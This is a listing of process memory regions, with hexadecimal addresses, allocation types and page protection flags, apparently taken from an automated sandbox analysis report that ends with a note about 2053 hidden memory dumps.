page read and write
36A000
heap
page read and write
1C155000
heap
page read and write
5175000
heap
page read and write
4FC7000
heap
page read and write
36D000
heap
page read and write
4D44000
heap
page read and write
50A8000
heap
page read and write
4FE6000
heap
page read and write
3F90000
trusted library allocation
page read and write
4DD6000
heap
page read and write
4D71000
heap
page read and write
4DFF000
heap
page read and write
4DFB000
heap
page read and write
49F8000
heap
page read and write
3A8000
heap
page read and write
2F50000
remote allocation
page read and write
4EBE000
heap
page read and write
367000
heap
page read and write
4E55000
heap
page read and write
4FFA000
heap
page read and write
3724000
heap
page read and write
7B0000
heap
page read and write
4F20000
heap
page read and write
4B4D000
heap
page read and write
50F9000
heap
page read and write
4F61000
heap
page read and write
382000
heap
page read and write
4FEA000
heap
page read and write
1300A000
trusted library allocation
page read and write
4FDE000
heap
page read and write
516D000
heap
page read and write
12628000
trusted library allocation
page read and write
4EC2000
heap
page read and write
505A000
heap
page read and write
508D000
heap
page read and write
5011000
heap
page read and write
506D000
heap
page read and write
50FB000
heap
page read and write
516C000
heap
page read and write
506D000
heap
page read and write
4D7A000
heap
page read and write
4DFF000
heap
page read and write
50E6000
heap
page read and write
12C39000
trusted library allocation
page read and write
379D000
heap
page read and write
4D8E000
heap
page read and write
4F2F000
heap
page read and write
5033000
heap
page read and write
38A000
heap
page read and write
4A01000
heap
page read and write
4E6A000
heap
page read and write
50D4000
heap
page read and write
4E9B000
heap
page read and write
5030000
heap
page read and write
4F60000
heap
page read and write
4E6F000
heap
page read and write
4DE4000
heap
page read and write
321B000
stack
page read and write
4FB8000
heap
page read and write
130CD000
trusted library allocation
page read and write
4E98000
heap
page read and write
504A000
heap
page read and write
4F00000
heap
page read and write
2F61000
trusted library allocation
page read and write
371A000
heap
page read and write
4F17000
heap
page read and write
5076000
heap
page read and write
4FF6000
heap
page read and write
50F6000
heap
page read and write
3C0000
direct allocation
page read and write
4D65000
heap
page read and write
4E5F000
heap
page read and write
518C000
heap
page read and write
4D86000
heap
page read and write
50D8000
heap
page read and write
3EB1000
heap
page read and write
4ECD000
heap
page read and write
4FEA000
heap
page read and write
5072000
heap
page read and write
4E29000
heap
page read and write
4F28000
heap
page read and write
366000
heap
page read and write
483000
heap
page read and write
4FFC000
heap
page read and write
4FB1000
heap
page read and write
5187000
heap
page read and write
CC1000
direct allocation
page execute and read and write
5194000
heap
page read and write
4E79000
heap
page read and write
5065000
heap
page read and write
4E43000
heap
page read and write
4800000
heap
page read and write
20000
heap
page read and write
4DAF000
heap
page read and write
4D71000
heap
page read and write
4D81000
heap
page read and write
378000
heap
page read and write
5074000
heap
page read and write
5090000
heap
page read and write
4F80000
heap
page read and write
4DCE000
heap
page read and write
4F1E000
heap
page read and write
39B000
heap
page read and write
4E5B000
heap
page read and write
3FC000
heap
page read and write
4DE5000
heap
page read and write
38A000
heap
page read and write
455000
heap
page read and write
4F85000
heap
page read and write
5006000
heap
page read and write
19A000
heap
page read and write
12E59000
trusted library allocation
page read and write
3D6C000
stack
page read and write
4B74000
heap
page read and write
37B000
heap
page read and write
377A000
heap
page read and write
7FE89C09000
trusted library allocation
page read and write
4E50000
heap
page read and write
5027000
heap
page read and write
5079000
heap
page read and write
43F000
heap
page read and write
50CF000
heap
page read and write
47F000
heap
page read and write
4EC2000
heap
page read and write
4E43000
heap
page read and write
4D88000
heap
page read and write
519B000
heap
page read and write
4D57000
heap
page read and write
4FAC000
heap
page read and write
4ED5000
heap
page read and write
4FA6000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
3A3000
heap
page read and write
340000
heap
page read and write
377000
heap
page read and write
500E000
heap
page read and write
36C000
heap
page read and write
39C000
heap
page read and write
4E76000
heap
page read and write
455000
heap
page read and write
4DF0000
heap
page read and write
2780000
heap
page read and write
50D4000
heap
page read and write
34C000
heap
page read and write
7FE89A5C000
trusted library allocation
page read and write
501F000
heap
page read and write
262000
heap
page read and write
4EF4000
heap
page read and write
2BDB000
trusted library allocation
page read and write
386000
heap
page read and write
7FE89950000
trusted library allocation
page read and write
1FF0000
heap
page read and write
4DAB000
heap
page read and write
4E40000
heap
page read and write
47E000
heap
page read and write
7FE8B534000
trusted library allocation
page read and write
4F0B000
heap
page read and write
1C29F000
stack
page read and write
4E99000
heap
page read and write
4D6C000
heap
page read and write
1F2D000
stack
page read and write
4B4F000
heap
page read and write
4DFC000
heap
page read and write
4DB6000
heap
page read and write
510F000
heap
page read and write
504D000
heap
page read and write
509D000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
4F98000
heap
page read and write
4E3000
heap
page read and write
358000
heap
page read and write
4EEC000
heap
page read and write
5076000
heap
page read and write
360000
heap
page read and write
4FA7000
heap
page read and write
366000
heap
page read and write
24B1000
trusted library allocation
page read and write
A0000
trusted library allocation
page read and write
50FB000
heap
page read and write
7FE8B5E0000
trusted library allocation
page read and write
3802000
trusted library allocation
page read and write
37F000
heap
page read and write
4E81000
heap
page read and write
504D000
heap
page read and write
4D58000
heap
page read and write
4DD6000
heap
page read and write
4DA0000
heap
page read and write
4F1F000
heap
page read and write
508C000
heap
page read and write
4D43000
heap
page read and write
4D9F000
heap
page read and write
4EEF000
heap
page read and write
381000
heap
page read and write
4F9F000
heap
page read and write
4E5A000
heap
page read and write
54D5000
heap
page read and write
4E0B000
heap
page read and write
3A3000
direct allocation
page read and write
1BE0000
heap
page read and write
504A000
heap
page read and write
34F000
heap
page read and write
2780000
heap
page read and write
4D85000
heap
page read and write
4F0C000
heap
page read and write
4F2D000
heap
page read and write
4EF3000
heap
page read and write
4E30000
heap
page read and write
4D4F000
heap
page read and write
505B000
heap
page read and write
373000
heap
page read and write
1B0000
trusted library allocation
page read and write
118000
heap
page read and write
4F65000
heap
page read and write
4D96000
heap
page read and write
50E0000
heap
page read and write
5022000
heap
page read and write
3F4000
heap
page read and write
38D000
heap
page read and write
4E31000
heap
page read and write
516D000
heap
page read and write
501F000
heap
page read and write
4E29000
heap
page read and write
2B80000
trusted library allocation
page execute read
4D62000
heap
page read and write
4ED2000
heap
page read and write
4E8E000
heap
page read and write
1162000
unkown
page execute read
4EE9000
heap
page read and write
4E04000
heap
page read and write
4E3F000
heap
page read and write
374000
heap
page read and write
4E4E000
heap
page read and write
4E54000
heap
page read and write
5039000
heap
page read and write
4ED7000
heap
page read and write
396000
heap
page read and write
4F80000
heap
page read and write
5188000
heap
page read and write
50FB000
heap
page read and write
50E1000
heap
page read and write
1AFCF000
stack
page read and write
50B6000
heap
page read and write
4E99000
heap
page read and write
508D000
heap
page read and write
4B6F000
heap
page read and write
4E61000
heap
page read and write
50AD000
heap
page read and write
3B4000
heap
page read and write
4E58000
heap
page read and write
49FF000
heap
page read and write
B44000
direct allocation
page execute and read and write
441000
heap
page read and write
4F9A000
heap
page read and write
4B71000
heap
page read and write
321000
heap
page read and write
4FA9000
heap
page read and write
4EE4000
heap
page read and write
504F000
heap
page read and write
4E5A000
heap
page read and write
7FE898C0000
trusted library allocation
page read and write
508B000
heap
page read and write
5030000
heap
page read and write
50AB000
heap
page read and write
2780000
heap
page read and write
5198000
heap
page read and write
500B000
heap
page read and write
35A000
heap
page read and write
4D67000
heap
page read and write
4DFB000
heap
page read and write
1C5FE000
stack
page read and write
517C000
heap
page read and write
3BD000
direct allocation
page read and write
4E49000
heap
page read and write
4DDE000
heap
page read and write
43D000
heap
page read and write
4E22000
heap
page read and write
5187000
heap
page read and write
34C000
heap
page read and write
4E96000
heap
page read and write
4E01000
heap
page read and write
4E4B000
heap
page read and write
4F1B000
heap
page read and write
4EB9000
heap
page read and write
8F0000
trusted library section
page read and write
4A01000
heap
page read and write
3D0000
heap
page read and write
7FE8B650000
trusted library allocation
page execute and read and write
4B76000
heap
page read and write
4FD1000
heap
page read and write
4DA5000
heap
page read and write
4FAE000
heap
page read and write
505F000
heap
page read and write
4DE6000
heap
page read and write
4E78000
heap
page read and write
4E3C000
heap
page read and write
3A1000
heap
page read and write
4DF3000
heap
page read and write
4E21000
heap
page read and write
4FF6000
heap
page read and write
4E54000
heap
page read and write
506D000
heap
page read and write
38B000
heap
page read and write
1C2ED000
heap
page read and write
124B1000
trusted library allocation
page read and write
3AE000
heap
page read and write
4DFC000
heap
page read and write
50AD000
heap
page read and write
5036000
heap
page read and write
506A000
heap
page read and write
50F9000
heap
page read and write
3B5A000
trusted library allocation
page read and write
4F35000
heap
page read and write
3915000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
381000
heap
page read and write
455000
heap
page read and write
4FC4000
heap
page read and write
50FC000
heap
page read and write
51AE000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
4FFE000
heap
page read and write
366000
heap
page read and write
4DCF000
heap
page read and write
510F000
heap
page read and write
4D75000
heap
page read and write
4E2A000
heap
page read and write
5021000
heap
page read and write
39E000
heap
page read and write
4E99000
heap
page read and write
4D5B000
heap
page read and write
4B76000
heap
page read and write
4DE6000
heap
page read and write
235F000
stack
page read and write
4E08000
heap
page read and write
516C000
heap
page read and write
4EA8000
heap
page read and write
50E1000
heap
page read and write
1A79E000
heap
page read and write
4DA8000
heap
page read and write
D40000
direct allocation
page execute and read and write
4D74000
heap
page read and write
4EFF000
heap
page read and write
5044000
heap
page read and write
4DCB000
heap
page read and write
500F000
heap
page read and write
4FD1000
heap
page read and write
1C2D2000
heap
page read and write
347000
heap
page read and write
4DAC000
heap
page read and write
423000
heap
page read and write
5015000
heap
page read and write
4D53000
heap
page read and write
5072000
heap
page read and write
36AC000
heap
page read and write
50F9000
heap
page read and write
4E33000
heap
page read and write
4DD3000
heap
page read and write
5182000
heap
page read and write
4E78000
heap
page read and write
4B7A000
heap
page read and write
349000
heap
page read and write
5042000
heap
page read and write
506F000
heap
page read and write
4E60000
heap
page read and write
4EF3000
heap
page read and write
4E73000
heap
page read and write
7FE8B54D000
trusted library allocation
page execute and read and write
36B2000
heap
page read and write
502D000
heap
page read and write
4DC5000
heap
page read and write
5C0000
heap
page read and write
4FCB000
heap
page read and write
4E89000
heap
page read and write
392000
heap
page read and write
5076000
heap
page read and write
4E09000
heap
page read and write
4D7B000
heap
page read and write
4E8F000
heap
page read and write
4EEE000
heap
page read and write
1C90A000
stack
page read and write
1FB3000
direct allocation
page read and write
4E8E000
heap
page read and write
50D4000
heap
page read and write
4E50000
heap
page read and write
1D37F000
stack
page read and write
4EFB000
heap
page read and write
4DCF000
heap
page read and write
4D86000
heap
page read and write
397000
heap
page read and write
50FD000
heap
page read and write
4FB1000
heap
page read and write
5178000
heap
page read and write
502F000
heap
page read and write
37B000
heap
page read and write
503A000
heap
page read and write
46C000
heap
page read and write
4D45000
heap
page read and write
4EC7000
heap
page read and write
386000
heap
page read and write
4DAD000
heap
page read and write
3214000
trusted library allocation
page read and write
4B48000
heap
page read and write
3C0000
heap
page read and write
4E8C000
heap
page read and write
4B48000
heap
page read and write
4B78000
heap
page read and write
3A3000
heap
page read and write
4FD9000
heap
page read and write
4EC6000
heap
page read and write
35B000
heap
page read and write
50AB000
heap
page read and write
7FE8B58C000
trusted library allocation
page execute and read and write
2D8000
heap
page read and write
4FBD000
heap
page read and write
4DAF000
heap
page read and write
50E9000
heap
page read and write
502E000
heap
page read and write
518C000
heap
page read and write
4FB7000
heap
page read and write
3A0000
heap
page read and write
3A2000
heap
page read and write
F4000
heap
page read and write
4E64000
heap
page read and write
4ED3000
heap
page read and write
4B71000
heap
page read and write
7FE8B700000
trusted library allocation
page read and write
5073000
heap
page read and write
4B4D000
heap
page read and write
4E8A000
heap
page read and write
4DF8000
heap
page read and write
4D93000
heap
page read and write
158000
heap
page read and write
4B7A000
heap
page read and write
4F8B000
heap
page read and write
4EE2000
heap
page read and write
4E4F000
heap
page read and write
4B21000
heap
page read and write
4E73000
heap
page read and write
4E45000
heap
page read and write
4F81000
heap
page read and write
38B000
heap
page read and write
3B9000
heap
page read and write
4DA3000
heap
page read and write
36E000
heap
page read and write
4ED5000
heap
page read and write
4DF3000
heap
page read and write
4F81000
heap
page read and write
4FDB000
heap
page read and write
3C9000
heap
page read and write
7FE89956000
trusted library allocation
page read and write
50AD000
heap
page read and write
410000
heap
page read and write
50A8000
heap
page read and write
455000
heap
page read and write
4B41000
heap
page read and write
4FB1000
heap
page read and write
4B41000
heap
page read and write
340000
heap
page read and write
4D8B000
heap
page read and write
5020000
heap
page read and write
4F9A000
heap
page read and write
4D61000
heap
page read and write
4DBA000
heap
page read and write
4E18000
heap
page read and write
50B0000
heap
page read and write
4E0F000
heap
page read and write
4B45000
heap
page read and write
5012000
heap
page read and write
5065000
heap
page read and write
4FBD000
heap
page read and write
35A000
heap
page read and write
4D70000
heap
page read and write
379B000
heap
page read and write
4D72000
heap
page read and write
342000
heap
page read and write
506E000
heap
page read and write
5022000
heap
page read and write
4EB9000
heap
page read and write
4DB1000
heap
page read and write
2F63000
trusted library allocation
page read and write
399000
heap
page read and write
7FE898FC000
trusted library allocation
page execute and read and write
5045000
heap
page read and write
4AF2000
heap
page read and write
B50000
direct allocation
page execute and read and write
5015000
heap
page read and write
5066000
heap
page read and write
50EA000
heap
page read and write
4DD5000
heap
page read and write
4F8A000
heap
page read and write
4DCF000
heap
page read and write
508C000
heap
page read and write
4B48000
heap
page read and write
5059000
heap
page read and write
51A9000
heap
page read and write
10000
heap
page read and write
2D55000
heap
page read and write
457000
heap
page read and write
4EC2000
heap
page read and write
There are 2053 hidden memdumps, click here to show them.